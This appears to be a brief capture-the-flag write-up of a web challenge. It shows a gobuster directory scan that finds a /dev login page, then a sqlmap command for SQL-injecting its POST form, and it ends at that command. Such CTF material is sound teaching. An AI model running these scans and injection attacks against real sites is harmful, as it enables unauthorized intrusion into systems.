# [Challenge 0x0f](https://www.youtube.com/watch?v=vAN1WFHM-e0)
**Unfortunately the challenge interface is down as i am writing this, but i can
still access the relevant "hacking" part of the challenge.  
This was supposed to be a wordpress site, but it seems like currently the database
is having some problems.** 

If this was a wordpress site, you would probably first check for wordpress folders like wp-admin or wp-content etc.  
These pages exist, but dont give us any point of attack so far.
So like everytime we dont know what to do, we just do a gobuster search:

```
gobuster -u http://the-morpheus.de:20016 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

After a while, next to the wp-xxx folders this will show us a /dev directory.  
Since development stuff is always interesting, we will look into it!

This presents us a login page. However, we sadly dont know the login. What do we do? SQLI!  
First we have to find out our parameters, those can be found in the source:
```html
<fieldset>
    <div class="form-group">
        <input class="form-control" placeholder="Username" name="username" type="text" autofocus>
    </div>
    <div class="form-group">
        <input class="form-control" placeholder="Password" name="password" type="password" value="">
    </div>
```
So our parameters are called `username` and `password` (the name attributes of the input fields).  
Time to fire up sqlmap:

```
sqlmap -u http://the-morpheus.de:20016/dev/index.php --level=5 --risk=3 --method=POST --data "username=&password="
```